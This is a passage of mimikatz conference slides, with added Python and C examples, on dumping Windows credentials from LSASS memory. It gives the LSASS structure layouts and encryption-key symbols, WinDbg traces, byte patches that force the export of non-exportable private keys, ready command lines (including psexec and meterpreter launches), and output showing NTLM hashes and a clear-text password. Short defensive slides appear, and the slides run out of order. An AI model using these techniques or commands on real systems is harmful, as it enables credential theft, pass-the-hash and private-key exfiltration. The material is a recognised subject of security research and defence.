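    """Constructed region: list head at +0, entries at +0x100/+0x200, strings from +0x300."""
    base, mem = 0x74000000, bytearray(0x400)
    head, entries, cursor = base, [base + 0x100, base + 0x200], [base + 0x300]

    def store(blob):                      # place a buffer, return (Length, MaximumLength, Buffer)
        addr = cursor[0]
        mem[addr - base:addr - base + len(blob)] = blob
        cursor[0] += len(blob) + 2
        return len(blob), len(blob) + 2, addr

    sessions = [                           # (LUID, user, domain, protected password bytes)
        (0x3E7, "SYSTEM", "NT AUTHORITY", b""),
        (0x35E8E, "Gentil Kiwi", "vm-w8-rp-x", bytes(range(0xA0, 0xB0))),
    ]
    links = [head] + entries + [head]
    for i, (luid, user, dom, prot) in enumerate(sessions):
        fields = (links[i + 2], links[i], 1, entries[i], luid,
                  *store(user.encode("utf-16-le")), *store(dom.encode("utf-16-le")), *store(prot))
        mem[entries[i] - base:entries[i] - base + ENTRY.size] = ENTRY.pack(*fields)
    mem[0:8] = struct.pack("<II", entries[0], entries[-1])        # head.Flink, head.Blink
    return (base, bytes(mem)), head


if __name__ == "__main__":
    img, head = build_sample_image()
    for e in walk_log_sess_list(img, head):
        print(f"LUID {e['luid']:#x}: {e['domain']}\\{e['user']} "
              f"protected password = {e['password_protected'].hex() or '(none)'}")
    print(find_session(img, head, 0x35E8E)["user"])
```

The cycle check matters on a live dump: a partially written or corrupted list otherwise loops forever, and the same walk applies unchanged to livessp!LiveGlobalLogonSessionList and the NT5 kerberos!KerbLogonSessionList once their entry layouts are substituted.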
mimikatz sekurlsa wdigest: demo time
sekurlsa::wdigest
mimikatz sekurlsa: livessp
because Microsoft was too good in closed networks
mimikatz sekurlsa livessp: how?
Actually I've only used a logical (empirical) approach to search for passwords…
- Protocol reading
- Symbols searching
~ Boring ~ … let's be more brutal this time: set a WinDbg trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz sekurlsa livessp: how?
Let's log in with a Live account on Windows 8
After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
  ← Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
  ← Yeah, Pass the Hash capability with a Live account too…

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
  ← A Live user can log on through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz sekurlsa livessp: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz sekurlsa
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me: yes!
mimikatz sekurlsa: kerberos
Let's log in with a normal account
After credential protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz sekurlsa kerberos (nt6): workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5): workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        /* […] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz sekurlsa: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa kerberos: "hu?"
Ok. It works…
But why?
Not for all logons on NT5 (it can need an unlock)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol…
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz / sekurlsa : LsaUnprotectMemory (slide 32)
All passwords in memory are encrypted, but in a reversible way, so they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
– This function relies on LsaEncryptMemory from lsasrv.dll.
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process? Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized:
– when we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are in LSASS.
mimikatz / sekurlsa : LsaEncryptMemory, NT5 (slide 33)
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESX
(diagram) Keys read from lsasrv.dll inside the lsass process and copied into mimikatz:
    g_cbRandomKey   DWORD (value 256)
    g_pRandomKey    BYTE[g_cbRandomKey]
    g_pDESXKey      BYTE[144]
    g_Feedback      BYTE[8]
mimikatz / sekurlsa : LsaEncryptMemory, NT6 (slide 34)
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
(diagram) Keys read from lsasrv.dll inside the lsass process and copied into mimikatz:
    InitializationVector   BYTE[16]
    h3DesKey               handle to a KIWI_BCRYPT_KEY
    hAesKey                handle to a KIWI_BCRYPT_KEY

    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE data;   /* etc. */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz / sekurlsa : memo (slide 35)
Security Packages / Protection Keys
    Package          Symbols                                                  Type
    tspkg            tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                                    LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList                            LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList, lsasrv!LogonSessionListCount    LIST_ENTRY, ULONG

    Key (NT 5)       Symbols
    RC4              lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESX             lsasrv!g_pDESXKey, lsasrv!g_Feedback

    Key (NT 6)       Symbols
    (IV)             lsasrv!InitializationVector
    3DES             lsasrv!h3DesKey
    AES              lsasrv!hAesKey
mimikatz / sekurlsa : memo (slide 36)
Some commands:
    mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
    mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */   // http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full

    Authentification Id        : 0;234870
    Package d'authentification : NTLM
    Utilisateur principal      : Gentil Kiwi
    Domaine d'authentification : vm-w8-rp-x

        msv1_0 :    * Utilisateur  : Gentil Kiwi
                    * Domaine      : vm-w8-rp-x
                    * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
                    * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :  * Utilisateur  : Gentil Kiwi
                    * Domaine      : vm-w8-rp-x
                    * Mot de passe : waza1234
        wdigest :   * Utilisateur  : Gentil Kiwi
                    * Domaine      : vm-w8-rp-x
                    * Mot de passe : waza1234
        tspkg :     * Utilisateur  : Gentil Kiwi
                    * Domaine      : vm-w8-rp-x
                    * Mot de passe : waza1234
        livessp :   n.t. (LUID KO)

(Output is in French: authentication id, authentication package, principal user, authentication domain; msv1_0 gives the LM and NTLM hashes, kerberos, wdigest and tspkg give the clear-text password; livessp has no entry for this LUID.)
mimikatz / sekurlsa : what we can do (slide 37)
Basics
– No physical access to the computer (the first step to pass-the-hash, then pass-the-pass)
– No admin rights, system rights, debug privileges (...)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– Nothing exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take the opportunities to stop backward compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz / crypto : what is it? (slide 38)
A little module that I wrote to:
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public part in DER format
    – with private keys in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI, in the mimikatz context
  • CNG, in the LSASS context (again!)
(module: mod_mimikatz_crypto)
mimikatz / crypto : how it's protected (slide 39)
Private keys are DPAPI protected:
– you cannot reuse private key files on another computer
  • at least not without the master keys and/or the users' passwords
Computer/User can load their own keys because they have enough secrets to do it (e.g. an opened session)
– yes, a computer/server opens a "session".
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Password and popup protection are a constraint for most users, and unavailable for computer keys.)
Importing without the export flag:
    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz / crypto / capi : how it works (slide 40)
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
– cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz / crypto / capi : how it's exported (PLAYSKOOL level) (slide 41)
(diagram) Flow in the calling process, CryptoAPI + RSA CSP: the process asks to export a key -> the CSP loads the private key -> DPAPI decode -> is the key exportable? -> yes: exported key / no: NTE_BAD_KEY_STATE
mimikatz / crypto / patch capi : because I own my process (slide 42)
When we want to export a certificate with its private key (or only the key), it goes to rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
    mimikatz # crypto::exportCertificates
    Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
      - Benjamin Delpy
            Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
            Provider       : Microsoft Enhanced Cryptographic Provider v1.0
            Type           : AT_KEYEXCHANGE
            Exportabilité  : NON
            Taille clé     : 2048
            Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
                (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
            Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

    ================ Certificat 0 ================
    Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
    Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Objet : CN=Benjamin Delpy, C=FR
    Il ne s'agit pas d'un certificat racine
    Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
      Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
      Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
    La clé privée NE PEUT PAS être exportée
    Succès du test de cryptage
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(Both mimikatz, "Exportabilité : NON", and certutil, "the private key CANNOT be exported", stop on the exportable flag: the private export fails with 0x8009000b, NTE_BAD_KEY_STATE, while the public DER export succeeds.)
mimikatz / crypto / patch capi : because I own my process (slide 43)
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
    .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
    .text:0AC0B7CB  90                   nop
    .text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

    .text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
    .text:0AC1F749  90                   nop
    .text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz / crypto / patch capi : demo time (slide 44)
Import, export, import as not exportable... export
mimikatz / crypto / patch capi : limitations (slide 45)
Because:
– I'm lazy
– I've seen RSA keys in the majority of real-life cases
  • Elliptic Curve a little...
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz / crypto / cng : how it works (slide 46)
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context:
the process uses RPC to call the "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
– It is, but it's not perfect...
mimikatz / crypto / cng : how it's exported (PLAYSKOOL level) (slide 47)
KeyIso Service (LSASS Process)
(diagram) Flow with CNG: the process asks to export a key -> RPC to the KeyIso service inside LSASS (on NT6 a SYSTEM process protected by the ML_SYSTEM mandatory label, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP and SYSTEM_MANDATORY_LABEL_NO_READ_UP) -> the service loads the private key -> DPAPI decode -> is the key exportable? -> yes: exported key sent back over RPC / no: NTE_NOT_SUPPORTED
mimikatz / crypto / patch cng : because sometimes I own LSASS (slide 48)
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) -> ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
    mimikatz # crypto::exportKeys
    [user] Clés CNG :
      - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
            Exportabilité : NON
            Taille clé    : 2048
            Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
            mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.

(The CNG key is flagged "Exportabilité : NON" and the private export fails with 0x80090029, NTE_NOT_SUPPORTED.)
mimikatz / crypto / patch cng : because sometimes I own LSASS (slide 49)
This time the checks and the keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
    .text:6C815210  75 1C    jnz short continue_key_export
    .text:6C815210  EB 1C    jmp short continue_key_export
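The byte-level transformation behind both patches, the capi one on slide 43 (0F 85 rel32 -> 90 E9 rel32) and the cng one just above (75 rel8 -> EB rel8), as an added C example that is not mimikatz code. It works on a local copy of the bytes, computes the branch target before and after and refuses the patch if the target moved. The rel32 displacement can be reused because the jmp starts one byte later but is one byte shorter, so it ends at the same address the jnz did. The addresses and bytes are the ones on the slides; nothing here touches another process (mimikatz writes these bytes into its own rsaenh.dll mapping for capi, and into LSASS for cng).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Branch target of the jump encoded at code[off], with base = virtual
 * address of code[0]. Handles short jcc/jmp (7x/EB rel8), jmp rel32 (E9)
 * and near jcc (0F 8x rel32). Returns 0 for anything else. */
uint32_t jump_target(const uint8_t *code, size_t len, size_t off, uint32_t base) {
    uint32_t ip = base + (uint32_t)off;
    int32_t rel;
    if (off + 2 <= len && (code[off] == 0xEB || (code[off] & 0xF0) == 0x70))
        return ip + 2 + (int8_t)code[off + 1];
    if (off + 5 <= len && code[off] == 0xE9) {
        memcpy(&rel, code + off + 1, 4);              /* little-endian x86 displacement */
        return ip + 5 + (uint32_t)rel;
    }
    if (off + 6 <= len && code[off] == 0x0F && (code[off + 1] & 0xF0) == 0x80) {
        memcpy(&rel, code + off + 2, 4);
        return ip + 6 + (uint32_t)rel;
    }
    return 0;
}

/* Make the conditional jump at code[off] unconditional without moving its
 * target. 0F 8x rel32 -> 90 E9 rel32: the jmp starts one byte later but is
 * one byte shorter, so it ends where the jnz ended and rel32 is reused as-is.
 * 7x rel8 -> EB rel8: same length, rel8 reused. Returns 1 when the patched
 * bytes resolve to the original target, 0 if the site is not a jcc. */
int force_jump(uint8_t *code, size_t len, size_t off, uint32_t base) {
    uint32_t before = jump_target(code, len, off, base);
    if (!before) return 0;
    if (code[off] == 0x0F) {
        code[off] = 0x90;                             /* nop */
        code[off + 1] = 0xE9;                         /* jmp rel32 */
        return jump_target(code, len, off + 1, base) == before;
    }
    if ((code[off] & 0xF0) == 0x70) {
        code[off] = 0xEB;                             /* jmp short */
        return jump_target(code, len, off, base) == before;
    }
    return 0;                                         /* already unconditional */
}

/* The three sites from the slides (rsaenh.dll x2, ncrypt.dll x1), as byte copies. */
typedef struct { const char *name; uint32_t va; uint8_t bytes[6]; size_t len; } patch_site;

int apply_slide_patches(void) {
    patch_site sites[] = {
        { "rsaenh continue_key_export_or_archive",         0x0AC0B7CBu, { 0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF }, 6 },
        { "rsaenh continue_key_export_or_archive_prepare", 0x0AC1F749u, { 0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF }, 6 },
        { "ncrypt continue_key_export",                    0x6C815210u, { 0x75, 0x1C, 0, 0, 0, 0 },             2 },
    };
    int ok = 0;
    for (size_t i = 0; i < sizeof sites / sizeof sites[0]; i++) {
        patch_site *s = &sites[i];
        uint32_t target = jump_target(s->bytes, s->len, 0, s->va);
        if (force_jump(s->bytes, s->len, 0, s->va)) {
            ok++;
            printf("%-48s %08X -> %08X  now:", s->name, s->va, target);
            for (size_t j = 0; j < s->len; j++) printf(" %02X", s->bytes[j]);
            printf("\n");
        }
    }
    return ok;                                        /* 3 when every site verified */
}

int main(void) { return apply_slide_patches() == 3 ? 0 : 1; }
```

The before/after target check is what protects a patcher against a DLL version where the displacement bytes differ: if the signature no longer matches a 0F 8x or 7x opcode, force_jump refuses rather than writing 90 E9 over unrelated instructions.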
mimikatz / crypto / patch cng : demo time (slide 50)
Import, export, import as not exportable... export again
mimikatz / crypto / patch cng : limitations (slide 51)
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
– certutil can...
mimikatz / crypto / patch cng : bonus (slide 52)
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
– yeah, like the good old certutil
Before the patch:
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    [...]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    La clé privée NE PEUT PAS être exportée
    Succès du test de chiffrement
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    [...]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    Succès du test de chiffrement
    CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz / crypto : memo (slide 53)
Some commands:
    mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
    mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
    mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz / crypto : what we can do (slide 54)
Exactly the same as for sekurlsa: it will prevent access to accounts/computers
– no admin, no admin, no admin...
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz : what else can it do? (slide 55)
– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM, AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver:
  • Play with tokens & privileges
  • Display the SSDT (x86 & x64)
  • List minifilter actions
  • List notifications (process, thread, image, registry)
  • List object hooks and procedures
  • ...
– ...
mimikatz : that's all folks (slide 56)
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact (slide 57)
blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz / sekurlsa : how LSA works (PLAYSKOOL level) (slide 7)
Authentication packages:
– take the user's credentials from the logon
– do their own stuff
– keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get that data and inject it into another logon session in LSASS, we skip the authentication part.
This is the principle of « Pass-the-hash »
– in fact, of « Pass-the-* »
mimikatz / sekurlsa : history of « pass-the-* » 1/2 (slide 8)
Pass-the-hash
– 1997 - Unix: modified SAMBA client for hash usage, Paul Ashton (EIGEN)
– 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
– 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
– 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash!
Pass-the-ticket
– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz / sekurlsa : history of « pass-the-* » 2/2 (slide 9)
Pass-the-pass
– 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 - Some organizations opened cases with Microsoft about it...
...Lots of time...
– beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 - Hernan Ochoa (Ampliasecurity) publishes on seclists that wce supports WDigest password extraction...
  • http://seclists.org/pen-test/2012/Mar/7
– 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 - yeah, once again... more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 - sekurlsa module without injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz / sekurlsa / tspkg : because sometimes the hash is not enough... (slide 10)
mimikatz / sekurlsa / tspkg : what is it? (slide 11)
Microsoft introduced SSO capability for Terminal Server with NT 6, to improve RemoteApps and Remote Desktop users' experience
– http://technet.microsoft.com/library/cc772108.aspx
It relies on CredSSP with Credentials Delegation (= account delegation)
